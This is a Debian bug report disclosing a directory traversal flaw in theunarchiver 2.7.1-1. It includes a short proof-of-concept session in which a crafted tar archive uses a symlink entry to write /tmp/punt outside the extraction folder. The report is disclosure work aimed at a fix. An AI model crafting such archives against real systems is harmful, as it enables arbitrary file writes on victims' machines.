Bug#642028: theunarchiver: directory traversal vulnerability

[Jakub Wilk]

Package: theunarchiver
Version: 2.7.1-1
Severity: grave
Tags: security
Justification: user security hole
theunarchiver is affected by a directory traversal vulnerability. It can 
be tricked by a specially crafted .tar file to unpack stuff into an 
arbitrary directory.

Proof of concept:

$ ls -l /tmp/punt
/bin/ls: cannot access /tmp/punt: No such file or directory

$ pwd
/home/jwilk/traversal-test

$ unar traversal.tar.gz
Extracting traversal.tar.gz...
  traversal.tar (?)...
    root (link)... Failed! (Unknown error)
    root (dir)... OK.
    root/tmp (dir)... OK.
    root/tmp/punt (0)... OK.
  Failed! (Unknown error)

$ ls -l /tmp/punt
-rw-r--r-- 1 jwilk users 0 Sep 18 17:00 /tmp/punt


-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)

Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages theunarchiver depends on:
ii  gnustep-base-runtime  1.22.1-1      
ii  libbz2-1.0            1.0.5-7       
ii  libc6                 2.13-21       
ii  libgcc1               1:4.6.1-11    
ii  libgnustep-base1.22   1.22.1-1      
ii  libicu44              4.4.2-2       
ii  libobjc3              4.6.1-11      
ii  libssl1.0.0           1.0.0e-2      
ii  libstdc++6            4.6.1-11      
ii  zlib1g                1:1.2.5.dfsg-1

--
Jakub Wilk



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org